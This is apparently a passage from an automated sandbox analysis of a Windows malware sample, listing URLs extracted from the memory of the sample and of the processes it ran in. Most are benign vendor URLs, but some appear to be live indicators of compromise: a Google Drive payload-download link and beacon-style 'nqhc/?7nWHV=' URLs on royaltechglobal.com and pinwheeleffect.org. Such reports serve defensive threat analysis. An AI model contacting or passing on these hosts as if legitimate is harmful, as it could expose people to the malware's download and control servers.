      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: explorer.exe, 0000001D.00000000.1580224687.000000000961D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1648018333.000000000961D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1440176093.000000000961D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1721790620.000000000961D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlG
      Source: explorer.exe, 0000001D.00000000.1482506374.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607755234.000000000FF66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1679355249.000000000FF66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609251797.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680572544.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1479868399.000000000FF66000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: help.exe, 00000013.00000002.5836975372.0000000004B34000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
      Source: help.exe, 00000013.00000002.5836164639.00000000044EC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPm
      Source: explorer.exe, 0000001D.00000000.1586221524.000000000A730000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1638822548.0000000003230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1449715301.000000000AFB0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 0000001D.00000000.1678287639.000000000FE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1606627275.000000000FE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1478136479.000000000FE9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso~m
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://subca.ocsp-certum.com01
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://subca.ocsp-certum.com02
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://subca.ocsp-certum.com05
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.Pinwheeleffect.org
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://www.certum.pl/CPS0
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: Jjfmcz1Hsz.exe, 0000000B.00000001.981233524.0000000000626000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.networksolutions.com/
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.networksolutions.com/legal/legal-notice.jsp
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.networksolutions.com/legal/static-service-agreement.jsp
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Accident_Lawyers.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKR
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/All_Inclusive_Vacation_Packages.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyU
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Anti_Wrinkle_Creams.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWx
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Best_Mortgage_Rates.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWx
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Best_Penny_Stocks.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRK
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Health_Insurance.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKR
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/High_Speed_Internet.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWx
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Migraine_Pain_Relief.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliW
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Parental_Control.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKR
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/Top_10_Luxury_Cars.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxR
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/__media__/js/trademark.php?d=pinwheeleffect.org&type=dflt
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/display.cfm
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/music_videos.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKRoC9f
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/nqhc/?7nWHV=5
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/px.js?ch=1
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/px.js?ch=2
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pinwheeleffect.org/sk-logabpstatus.php?a=YmlpWHJIRVYyampuaVBhSWtiaUhEMTB1TStFNU85UGtUWk11
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
      Source: Jjfmcz1Hsz.exe, 0000000B.00000001.980956789.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Jjfmcz1Hsz.exe, 0000000B.00000001.980956789.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/comments/feed/
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/feed/
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-content/themes/twentytwentytwo/style.css?ver=1.3
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/style.min.css?ver=6.1.1
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view-modal.min.js?ver=45f05135277abf
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view.min.js?ver=c24330f635f5cb9d5e0e
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/wlwmanifest.xml
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-json/
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://xn--299aa717y.xn--3e0b707e/xmlrpc.php?rsd
      Source: help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: explorer.exe, 0000001D.00000000.1483111483.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680933547.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609653243.000000001009F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
      Source: explorer.exe, 0000001D.00000000.1442929824.0000000009766000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1581778979.0000000009766000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1723530361.0000000009766000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1649577925.0000000009766000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
      Source: explorer.exe, 0000001D.00000000.1478136479.000000000FE9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 0000001D.00000000.1678287639.000000000FE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1606627275.000000000FE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1478136479.000000000FE9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSft
      Source: explorer.exe, 0000001D.00000000.1660440129.000000000D010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1455099014.000000000D010000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 0000001D.00000000.1566141100.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1707044735.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1423308088.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1634292873.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/#
      Source: explorer.exe, 0000001D.00000000.1649577925.0000000009766000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 0000001D.00000000.1650696927.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1582853419.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1724750579.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1444672750.0000000009848000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1650696927.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1582853419.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1724750579.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1444672750.0000000009848000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
      Source: explorer.exe, 0000001D.00000000.1650696927.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1582853419.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1724750579.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1444672750.0000000009848000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comG
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1994520363.0000000008428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
      Source: help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1994520363.0000000008428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1171500382.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181941990.0000000001819000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1182040292.000000000182A000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325068211.0000000001819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
      Source: explorer.exe, 0000001D.00000000.1482349161.0000000010048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680456207.0000000010048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1182355015.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181384461.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177181129.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325265421.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/b
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1182355015.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1171500382.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181941990.0000000001819000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181384461.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1171881255.0000000001871000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324345210.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177181129.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325265421.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177142759.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325068211.0000000001819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/41p6p8b8
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1324658870.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1341834928.000000001CBD0000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324345210.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73H
      Source: help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
      Source: help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: help.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: explorer.exe, 0000001D.00000000.1734878004.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1479232269.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607377108.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1660900795.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1590839096.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1455985675.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1678904598.000000000FF1B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: help.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Noto
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1994520363.0000000008428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1994520363.0000000008428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
      Source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: help.exe, 00000013.00000002.5837586951.0000000004FEA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
      Source: help.exe, 00000013.00000002.5836975372.0000000004B34000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21461531.js
      Source: help.exe, 00000013.00000002.5814918188.000000000356E000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000013.00000003.1923270915.000000000356E000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000013.00000003.1919168429.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
      Source: help.exe, 00000013.00000002.5814918188.000000000356E000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000013.00000003.1923270915.000000000356E000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000013.00000003.1919168429.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
      Source: help.exe, 00000013.00000002.5814918188.000000000356E000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000013.00000003.1923270915.000000000356E000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000013.00000003.1919168429.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
      Source: explorer.exe, 0000001D.00000000.1734878004.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1660900795.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1590839096.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1455985675.000000000D05C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 0000001D.00000000.1479232269.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607377108.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1678904598.000000000FF1B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com:SaturdayQ
